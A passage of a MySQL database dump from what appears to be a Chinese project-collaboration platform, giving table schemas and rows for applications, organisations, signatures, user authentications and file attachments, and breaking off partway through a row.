16:32:20',1,NULL,1),(15,34,NULL,NULL,'TrialAuthorization',NULL,'2019-03-13 16:32:20','2019-03-13 16:32:20',1,NULL,1),(16,35,NULL,NULL,'TrialAuthorization',NULL,'2019-03-13 16:32:20','2019-03-13 16:32:20',1,NULL,1),(17,36,NULL,NULL,'TrialAuthorization',NULL,'2019-03-13 16:32:20','2019-03-13 16:32:20',1,NULL,1),(18,37,NULL,NULL,'TrialAuthorization',NULL,'2019-03-13 16:32:20','2019-03-13 16:32:20',1,NULL,1),(19,38,NULL,NULL,'TrialAuthorization',NULL,'2019-03-13 16:32:21','2019-03-13 16:32:21',1,NULL,1),(20,39,NULL,NULL,'TrialAuthorization',NULL,'2019-03-13 16:32:21','2019-03-13 16:32:21',1,NULL,1),(21,40,NULL,NULL,'TrialAuthorization',NULL,'2019-03-13 16:32:21','2019-03-13 16:32:21',1,NULL,1);
|
||
/*!40000 ALTER TABLE `apply_actions` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `apply_add_departments`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `apply_add_departments`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `apply_add_departments` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`name` varchar(255) DEFAULT NULL,
|
||
`department_id` int(11) DEFAULT NULL,
|
||
`school_id` int(11) DEFAULT NULL,
|
||
`remarks` text,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`status` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_apply_add_departments_on_department_id` (`department_id`),
|
||
KEY `index_apply_add_departments_on_school_id` (`school_id`),
|
||
KEY `index_apply_add_departments_on_user_id` (`user_id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `apply_add_departments`
|
||
--
|
||
|
||
LOCK TABLES `apply_add_departments` WRITE;
|
||
/*!40000 ALTER TABLE `apply_add_departments` DISABLE KEYS */;
|
||
INSERT INTO `apply_add_departments` VALUES (1,'国际贸易学院',1,11,'',4,1,'2018-07-08 10:29:41','2018-08-10 09:31:40'),(2,'计算机',2,11,'',4,0,'2018-07-08 10:30:07','2018-07-08 10:30:07'),(3,'计算机1',3,117,'',5,0,'2018-08-10 09:35:22','2018-08-10 09:35:22');
|
||
/*!40000 ALTER TABLE `apply_add_departments` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `apply_add_schools`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `apply_add_schools`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `apply_add_schools` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`name` varchar(255) DEFAULT NULL,
|
||
`province` varchar(255) DEFAULT NULL,
|
||
`city` varchar(255) DEFAULT NULL,
|
||
`address` varchar(255) DEFAULT NULL,
|
||
`remarks` varchar(255) DEFAULT NULL,
|
||
`school_id` int(11) DEFAULT NULL,
|
||
`status` int(11) DEFAULT '0',
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `apply_add_schools`
|
||
--
|
||
|
||
LOCK TABLES `apply_add_schools` WRITE;
|
||
/*!40000 ALTER TABLE `apply_add_schools` DISABLE KEYS */;
|
||
INSERT INTO `apply_add_schools` VALUES (1,'绿色计算产业联盟','北京','海淀','万寿路27号','',3159,1,'2018-08-06 15:26:49','2018-08-06 15:26:49',9),(2,'微网云(深圳)技术有限公司','广东','深圳','罗湖区银湖路金湖一街39-2','',3160,0,'2018-09-05 13:58:54','2018-09-05 13:58:54',14),(3,'中国电子工业标准化技术协会','北京','海淀','海淀区万寿路27号','',3161,0,'2018-09-07 12:38:28','2018-09-07 12:38:28',15),(4,'SKhynix','北京','朝阳','北京市朝阳区建国门外大街深甲6号SK大厦2501~02(100022)','',3162,0,'2018-10-12 17:40:22','2018-10-12 17:40:22',17);
|
||
/*!40000 ALTER TABLE `apply_add_schools` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `apply_forums`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `apply_forums`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `apply_forums` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`user_ip` varchar(255) DEFAULT NULL,
|
||
`forum_section_id` int(11) DEFAULT NULL,
|
||
`is_confirm` int(11) DEFAULT '0',
|
||
`confirm_user_id` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`deal_time` datetime DEFAULT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_apply_forums_on_user_id_and_forum_section_id` (`user_id`,`forum_section_id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `apply_forums`
|
||
--
|
||
|
||
LOCK TABLES `apply_forums` WRITE;
|
||
/*!40000 ALTER TABLE `apply_forums` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `apply_forums` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `apply_project_masters`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `apply_project_masters`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `apply_project_masters` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`apply_type` varchar(255) DEFAULT NULL,
|
||
`apply_id` int(11) DEFAULT NULL,
|
||
`status` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `apply_project_masters`
|
||
--
|
||
|
||
LOCK TABLES `apply_project_masters` WRITE;
|
||
/*!40000 ALTER TABLE `apply_project_masters` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `apply_project_masters` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `apply_resources`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `apply_resources`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `apply_resources` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`status` int(11) DEFAULT NULL,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`attachment_id` int(11) DEFAULT NULL,
|
||
`container_id` int(11) DEFAULT NULL,
|
||
`container_type` varchar(255) DEFAULT NULL,
|
||
`content` text,
|
||
`apply_user_id` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `apply_resources`
|
||
--
|
||
|
||
LOCK TABLES `apply_resources` WRITE;
|
||
/*!40000 ALTER TABLE `apply_resources` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `apply_resources` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `apply_signatures`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `apply_signatures`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `apply_signatures` (
|
||
`id` bigint(20) NOT NULL AUTO_INCREMENT,
|
||
`user_id` bigint(20) DEFAULT NULL,
|
||
`project_id` bigint(20) DEFAULT NULL,
|
||
`status` int(11) DEFAULT '0',
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_apply_signatures_on_user_id` (`user_id`),
|
||
KEY `index_apply_signatures_on_project_id` (`project_id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=135 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `apply_signatures`
|
||
--
|
||
|
||
LOCK TABLES `apply_signatures` WRITE;
|
||
/*!40000 ALTER TABLE `apply_signatures` DISABLE KEYS */;
|
||
INSERT INTO `apply_signatures` VALUES (46,128,430,1,'2021-01-04 05:42:41','2021-01-04 08:27:12'),(48,133,430,1,'2021-01-04 07:33:11','2021-01-04 07:41:48'),(55,1,430,1,'2021-01-05 09:04:14','2021-01-05 09:04:23'),(61,46,448,1,'2021-01-07 01:44:27','2021-01-07 01:45:20'),(69,1,448,1,'2021-01-19 02:29:45','2021-01-19 02:30:25'),(70,155,430,0,'2021-01-25 06:58:01','2021-01-25 06:58:01'),(71,1,477,1,'2021-01-27 00:46:23','2021-01-27 00:46:41'),(72,49,477,1,'2021-01-27 01:02:19','2021-01-27 01:02:36'),(73,73,477,1,'2021-01-27 01:35:54','2021-01-28 07:09:58'),(74,46,477,1,'2021-01-28 07:09:49','2021-01-28 07:11:49'),(75,157,477,1,'2021-01-28 08:05:04','2021-01-28 08:09:45'),(76,158,477,1,'2021-01-28 08:09:31','2021-01-28 08:09:47'),(77,137,477,1,'2021-01-28 08:18:00','2021-01-28 08:18:15'),(78,159,477,1,'2021-01-28 10:29:18','2021-01-28 10:29:55'),(79,152,477,1,'2021-01-28 14:10:58','2021-01-28 14:11:07'),(80,160,487,0,'2021-01-28 15:27:19','2021-01-28 15:27:19'),(81,160,477,1,'2021-01-28 15:33:04','2021-01-28 15:33:30'),(82,162,477,1,'2021-02-20 01:28:01','2021-02-20 01:34:16'),(83,164,477,1,'2021-02-20 01:43:20','2021-02-20 02:00:13'),(84,167,477,1,'2021-02-20 01:58:53','2021-02-20 02:00:44'),(85,171,477,1,'2021-02-20 02:49:57','2021-02-20 03:30:20'),(86,155,489,0,'2021-02-20 04:44:36','2021-02-20 04:44:36'),(87,174,489,0,'2021-02-22 01:44:48','2021-02-22 01:44:48'),(88,181,477,1,'2021-02-25 00:47:51','2021-02-25 00:56:07'),(89,182,477,1,'2021-02-25 01:07:52','2021-02-25 01:09:06'),(90,128,477,1,'2021-02-25 06:29:12','2021-02-25 06:29:50'),(91,128,496,1,'2021-02-25 08:57:01','2021-02-25 08:57:10'),(92,179,477,1,'2021-02-25 13:23:33','2021-03-01 03:41:30'),(93,184,501,1,'2021-02-26 02:27:07','2021-02-26 02:34:16'),(94,186,477,1,'2021-03-01 11:13:39','2021-03-01 11:16:33'),(95,128,503,1,'2021-03-03 01:15:26','2021-03-03 01:15:49'),(96,194,477,1,'2021-03-04 02:27:31','2021-03-04 04:55:02'),(97,173,477,1,'2021-03-04 02:50:44','2021-03-04 04:55:48'),(98,192,477,1,'2021-03-04 03:50:49','2021-03-04 04:56:06'),(100,133,505,1,'2021-03-04 07:23:57','2021-03-04 07:24:20'),(101,187,477,0,'2021-03-04 07:40:09','2021-03-04 07:40:09'),(102,191,506,0,'2021-03-05 01:04:28','2021-03-05 01:04:28'),(103,165,501,0,'2021-03-05 01:04:48','2021-03-05 01:04:48'),(104,128,506,1,'2021-03-05 01:11:57','2021-03-05 01:12:31'),(105,206,477,1,'2021-03-05 14:07:11','2021-03-06 02:54:00'),(106,175,513,0,'2021-03-06 08:27:47','2021-03-06 08:27:47'),(107,179,513,0,'2021-03-06 08:37:52','2021-03-06 08:37:52'),(108,207,477,1,'2021-03-06 09:22:17','2021-03-06 10:43:35'),(109,189,477,1,'2021-03-06 10:11:10','2021-03-06 10:43:41'),(110,208,515,0,'2021-03-07 04:11:54','2021-03-07 04:11:54'),(111,211,477,1,'2021-03-07 15:24:14','2021-03-08 00:24:59'),(112,208,516,0,'2021-03-08 01:42:36','2021-03-08 01:42:36'),(113,208,477,1,'2021-03-08 05:13:27','2021-03-08 12:09:18'),(114,208,507,0,'2021-03-08 08:34:56','2021-03-08 08:34:56'),(115,208,506,0,'2021-03-08 08:34:59','2021-03-08 08:34:59'),(116,208,513,0,'2021-03-08 08:35:02','2021-03-08 08:35:02'),(117,208,514,0,'2021-03-08 08:35:04','2021-03-08 08:35:04'),(118,212,516,0,'2021-03-09 08:10:42','2021-03-09 08:10:42'),(119,190,477,1,'2021-03-09 08:26:19','2021-03-09 08:26:53'),(120,214,516,0,'2021-03-09 08:48:58','2021-03-09 08:48:58'),(121,214,517,0,'2021-03-09 08:49:06','2021-03-09 08:49:06'),(122,214,515,0,'2021-03-09 08:49:43','2021-03-09 08:49:43'),(123,214,514,0,'2021-03-09 08:49:47','2021-03-09 08:49:47'),(124,214,513,0,'2021-03-09 08:49:51','2021-03-09 08:49:51'),(125,214,512,0,'2021-03-09 08:49:55','2021-03-09 08:49:55'),(126,214,477,1,'2021-03-09 08:49:57','2021-03-09 09:34:12'),(127,214,507,0,'2021-03-09 08:50:00','2021-03-09 08:50:00'),(128,214,506,0,'2021-03-09 08:50:03','2021-03-09 08:50:03'),(129,215,517,0,'2021-03-09 14:00:54','2021-03-09 14:00:54'),(130,216,518,0,'2021-03-10 10:06:08','2021-03-10 10:06:08'),(131,216,516,0,'2021-03-10 10:06:20','2021-03-10 10:06:20'),(132,217,520,0,'2021-03-10 23:13:11','2021-03-10 23:13:11'),(133,217,477,0,'2021-03-11 06:16:41','2021-03-11 06:16:41'),(134,218,477,1,'2021-03-11 07:11:32','2021-03-11 07:11:50');
|
||
/*!40000 ALTER TABLE `apply_signatures` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `apply_user_authentications`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `apply_user_authentications`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `apply_user_authentications` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`status` int(11) DEFAULT NULL,
|
||
`auth_type` int(11) DEFAULT NULL,
|
||
`remarks` varchar(255) DEFAULT NULL,
|
||
`dealer` int(11) DEFAULT NULL,
|
||
`deal_time` datetime DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`is_delete` tinyint(1) DEFAULT '0',
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_apply_user_authentications_on_user_id` (`user_id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=11 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `apply_user_authentications`
|
||
--
|
||
|
||
LOCK TABLES `apply_user_authentications` WRITE;
|
||
/*!40000 ALTER TABLE `apply_user_authentications` DISABLE KEYS */;
|
||
INSERT INTO `apply_user_authentications` VALUES (1,61,1,3,NULL,50,'2019-10-29 17:13:58','2019-10-29 17:13:49','2019-10-29 17:13:58',0),(2,49,1,3,NULL,50,'2019-10-31 14:45:56','2019-10-31 14:43:49','2019-10-31 14:45:56',0),(3,64,1,3,NULL,50,'2019-11-01 15:40:10','2019-11-01 15:39:59','2019-11-01 15:40:10',0),(4,71,1,3,NULL,50,'2019-11-05 15:36:18','2019-11-05 15:35:46','2019-11-05 15:36:18',0),(7,129,1,3,NULL,1,'2020-12-31 14:44:47','2020-12-27 11:46:48','2020-12-31 14:44:47',0),(8,172,1,3,NULL,1,'2021-02-25 08:51:26','2021-02-20 11:09:40','2021-02-25 08:51:26',0),(9,182,1,3,NULL,1,'2021-02-25 08:51:23','2021-02-25 08:49:35','2021-02-25 08:51:23',0),(10,203,1,3,NULL,1,'2021-03-09 10:15:37','2021-03-05 13:13:54','2021-03-09 10:15:37',0);
|
||
/*!40000 ALTER TABLE `apply_user_authentications` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `ar_internal_metadata`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `ar_internal_metadata`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `ar_internal_metadata` (
|
||
`key` varchar(255) NOT NULL,
|
||
`value` varchar(255) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`key`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `ar_internal_metadata`
|
||
--
|
||
|
||
LOCK TABLES `ar_internal_metadata` WRITE;
|
||
/*!40000 ALTER TABLE `ar_internal_metadata` DISABLE KEYS */;
|
||
INSERT INTO `ar_internal_metadata` VALUES ('environment','production','2020-08-18 10:10:32','2020-08-18 10:10:32');
|
||
/*!40000 ALTER TABLE `ar_internal_metadata` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `at_messages`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `at_messages`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `at_messages` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`at_message_id` int(11) DEFAULT NULL,
|
||
`at_message_type` varchar(255) DEFAULT NULL,
|
||
`viewed` tinyint(1) DEFAULT '0',
|
||
`container_type` varchar(255) DEFAULT NULL,
|
||
`container_id` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`sender_id` int(11) DEFAULT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_at_messages_on_user_id` (`user_id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `at_messages`
|
||
--
|
||
|
||
LOCK TABLES `at_messages` WRITE;
|
||
/*!40000 ALTER TABLE `at_messages` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `at_messages` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `attachment_histories`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `attachment_histories`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `attachment_histories` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`container_id` int(11) DEFAULT NULL,
|
||
`container_type` varchar(255) DEFAULT NULL,
|
||
`filename` varchar(255) DEFAULT '',
|
||
`disk_filename` varchar(255) DEFAULT '',
|
||
`filesize` int(11) DEFAULT '0',
|
||
`content_type` varchar(255) DEFAULT '',
|
||
`digest` varchar(40) DEFAULT '',
|
||
`downloads` int(11) DEFAULT '0',
|
||
`author_id` int(11) DEFAULT NULL,
|
||
`created_on` datetime DEFAULT NULL,
|
||
`description` text,
|
||
`disk_directory` varchar(255) DEFAULT NULL,
|
||
`attachtype` int(11) DEFAULT NULL,
|
||
`is_public` int(11) DEFAULT NULL,
|
||
`copy_from` int(11) DEFAULT NULL,
|
||
`quotes` int(11) DEFAULT NULL,
|
||
`version` int(11) DEFAULT NULL,
|
||
`attachment_id` int(11) DEFAULT NULL,
|
||
`is_publish` int(11) DEFAULT '1',
|
||
`publish_time` date DEFAULT NULL,
|
||
`memo_image` tinyint(1) DEFAULT '0',
|
||
`extra_type` int(11) DEFAULT '0',
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `attachment_histories`
|
||
--
|
||
|
||
LOCK TABLES `attachment_histories` WRITE;
|
||
/*!40000 ALTER TABLE `attachment_histories` DISABLE KEYS */;
|
||
INSERT INTO `attachment_histories` VALUES (1,155,'Project','1','191008134852_1',356,NULL,'918bc384427fae1edd54be4c89ccf3a3',0,20,'2019-10-08 13:49:53','三四三','2019/10',1,0,766,NULL,1,767,1,NULL,0,0);
|
||
/*!40000 ALTER TABLE `attachment_histories` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `attachments`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `attachments`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `attachments` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`container_id` int(11) DEFAULT NULL,
|
||
`container_type` varchar(30) DEFAULT NULL,
|
||
`filename` varchar(255) NOT NULL DEFAULT '',
|
||
`disk_filename` varchar(255) NOT NULL DEFAULT '',
|
||
`filesize` int(11) NOT NULL DEFAULT '0',
|
||
`content_type` varchar(255) DEFAULT '',
|
||
`digest` varchar(60) NOT NULL DEFAULT '',
|
||
`downloads` int(11) NOT NULL DEFAULT '0',
|
||
`author_id` int(11) NOT NULL DEFAULT '0',
|
||
`created_on` datetime DEFAULT NULL,
|
||
`description` text,
|
||
`disk_directory` varchar(255) DEFAULT NULL,
|
||
`attachtype` int(11) DEFAULT '1',
|
||
`is_public` int(11) DEFAULT '1',
|
||
`copy_from` int(11) DEFAULT NULL,
|
||
`quotes` int(11) DEFAULT NULL,
|
||
`is_publish` int(11) DEFAULT '1',
|
||
`publish_time` datetime DEFAULT NULL,
|
||
`memo_image` tinyint(1) DEFAULT '0',
|
||
`extra_type` int(11) DEFAULT '0',
|
||
`cloud_url` varchar(255) DEFAULT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_attachments_on_author_id` (`author_id`),
|
||
KEY `index_attachments_on_created_on` (`created_on`),
|
||
KEY `index_attachments_on_container_id_and_container_type` (`container_id`,`container_type`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=1526 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `attachments`
|
||
--
|
||
|
||
LOCK TABLES `attachments` WRITE;
|
||
/*!40000 ALTER TABLE `attachments` DISABLE KEYS */;
|
||
INSERT INTO `attachments` VALUES (1,NULL,'Memo','fd895d97b8603182ba79acf387249aee','180706174231_fd895d97b8603182ba79acf387249aee',31177,'image/png','6a4341a2b8c2e08ca29c7c32a3b125cc',1,1,'2018-07-06 17:42:31',NULL,'2018/07',1,1,NULL,NULL,1,NULL,0,0,NULL),(2,NULL,NULL,'10725_Israel_Arm-Cadence_Seminar_landingpage_symphony_V1.jpg','180711092714_10725_Israel_Arm-Cadence_Seminar_landingpage_symphony_V1.jpg',126868,'image/jpeg','017d3c6e069c4e6d5a49132caee94b46',0,1,'2018-07-11 09:27:14',NULL,'2018/07',1,1,NULL,NULL,1,NULL,0,0,NULL),(3,NULL,NULL,'t1.jpg','180711093056_t1.jpg',17788,'image/jpeg','f34b7d15263bec4ddaa4d849be25615e',0,1,'2018-07-11 09:30:56',NULL,'2018/07',1,1,NULL,NULL,1,NULL,0,0,NULL),(4,NULL,NULL,'217.png','180711093313_217.png',101666,'image/png','4830493c581c04773725deaca033b318',0,1,'2018-07-11 09:33:13',NULL,'2018/07',1,1,NULL,NULL,1,NULL,0,0,NULL),(10,NULL,'Memo','c52b0a5f5358fb7522c4f9e6641ce2d6','180711144510_c52b0a5f5358fb7522c4f9e6641ce2d6',112307,'image/jpeg','5e0db8f47518e2a38dcc6efbbb506f40',2,1,'2018-07-11 14:45:10',NULL,'2018/07',1,1,NULL,NULL,1,NULL,0,0,NULL),(11,NULL,'Memo','7293b3152cb0a99e6de9133114f9b414','180711150509_7293b3152cb0a99e6de9133114f9b414',320670,'image/jpeg','89c28827c55480cbe43b8a12d8789a1e',2,1,'2018-07-11 15:05:09',NULL,'2018/07',1,1,NULL,NULL,1,NULL,0,0,NULL),(24,2,'Memo','36efba9fc82d46118e6fa4600c9b42da_th.png','180719091121_36efba9fc82d46118e6fa4600c9b42da_th.png',45747,'image/png','ad724cbd060dd0e7f8916d83f021418d',593,1,'2018-07-19 09:11:21',NULL,'2018/07',1,1,NULL,NULL,1,NULL,1,0,NULL),(29,21,'Memo','2018-07-19_092049.jpg','180719092105_2018-07-19_092049.jpg',200911,'image/jpeg','f0495a3aecf12f1683fa44af788dfc2d',647,1,'2018-07-19 09:21:05',NULL,'2018/07',1,1,NULL,NULL,1,NULL,1,0,NULL),(36,22,'Memo','78ac000b4c39c38f1198.jpg','180719093052_78ac000b4c39c38f1198.jpg',41681,'image/jpeg','bd981c82461bf2a5cb279df214774120',94,1,'2018-07-19 09:30:52',NULL,'2018/07',1,1,NULL,NULL,1,NULL,1,0,NULL),(52,NULL,'Memo','487408eb9d2189cb318b3279d8f19cfd','180719100415_487408eb9d2189cb318b3279d8f19cfd',183972,'image/jpeg','833db59c166abc6e388cb5c2f578a24f',3,1,'2018-07-19 10:04:15',NULL,'2018/07',1,1,NULL,NULL,1,NULL,0,0,NULL),(53,NULL,'Memo','6c886a882bd4aa0809079d02bfee8db0','180719100435_6c886a882bd4aa0809079d02bfee8db0',162405,'image/jpeg','de6e2c0de2dea02119a03991ff7162e5',3,1,'2018-07-19 10:04:35',NULL,'2018/07',1,1,NULL,NULL,1,NULL,0,0,NULL),(59,NULL,'Memo','8e97bfcd7198383d46c931c223b2cb65','180719102419_8e97bfcd7198383d46c931c223b2cb65',15276,'image/jpeg','849b29b7bf797fde5132d996de470a4c',4,1,'2018-07-19 10:24:19',NULL,'2018/07',1,1,NULL,NULL,1,NULL,0,0,NULL),(69,97,'Memo','11f2e0a685a749c4a6d5b145c28d4cee.jpeg','180720111541_11f2e0a685a749c4a6d5b145c28d4cee.jpeg',14295,'image/jpeg','a197f40fb2d83ea5329eb4eef0a83bee',408,1,'2018-07-20 11:15:41',NULL,'2018/07',1,1,NULL,NULL,1,NULL,1,0,NULL),(71,NULL,NULL,'cookies3.txt','180723113312_cookies3.txt',274,'','f41e6655c5746301715e55ec2e36fa34',0,5,'2018-07-23 11:33:12',NULL,'2018/07',1,1,NULL,NULL,1,NULL,0,0,NULL),(74,15,'Issue','cookies3.txt','180723142458_cookies3.txt',274,NULL,'f41e6655c5746301715e55ec2e36fa34',0,5,'2018-07-23 14:24:58','','2018/07',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(75,15,'Issue','cookies2.txt','180723142500_cookies2.txt',274,NULL,'6b9b946c530a9c25a1b84cab2ac4987a',0,5,'2018-07-23 14:25:00','','2018/07',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(76,NULL,NULL,'HTTP请求basic.png','180723142616_1379f911ff3dcf155553b019fb54acc5.png',84123,'','da67108e07319b67ccba9d7d059af7e0',0,5,'2018-07-23 14:26:16',NULL,'2018/07',1,1,NULL,NULL,1,NULL,0,0,NULL),(77,NULL,NULL,'QQ图片20170621113033.gif','180723142727_9464f4b557e6a46e4974502d64bb4593.gif',2694278,'','df781a7ac8219cd3707358c04a1ad257',0,5,'2018-07-23 14:27:27',NULL,'2018/07',1,1,NULL,NULL,1,NULL,0,0,NULL),(78,15,'Issue','QQ图片20170621113033.gif','180723142805_9464f4b557e6a46e4974502d64bb4593.gif',2694278,NULL,'df781a7ac8219cd3707358c04a1ad257',0,5,'2018-07-23 14:28:05','','2018/07',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(79,15,'Issue','kosasa01cookie.txt','180723143132_kosasa01cookie.txt',462,NULL,'cba10ecfd7d5677725cb9a768c587bca',0,5,'2018-07-23 14:31:32','','2018/07',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(80,14,'Issue','cookies3.txt','180723143148_cookies3.txt',274,NULL,'f41e6655c5746301715e55ec2e36fa34',0,5,'2018-07-23 14:31:48','','2018/07',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(81,13,'Issue','QQ图片20170621113033.gif','180723143208_9464f4b557e6a46e4974502d64bb4593.gif',2694278,NULL,'df781a7ac8219cd3707358c04a1ad257',0,5,'2018-07-23 14:32:09','','2018/07',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(85,14,'Issue','QQ图片20170621113033.gif','180723143317_9464f4b557e6a46e4974502d64bb4593.gif',2694278,NULL,'df781a7ac8219cd3707358c04a1ad257',0,5,'2018-07-23 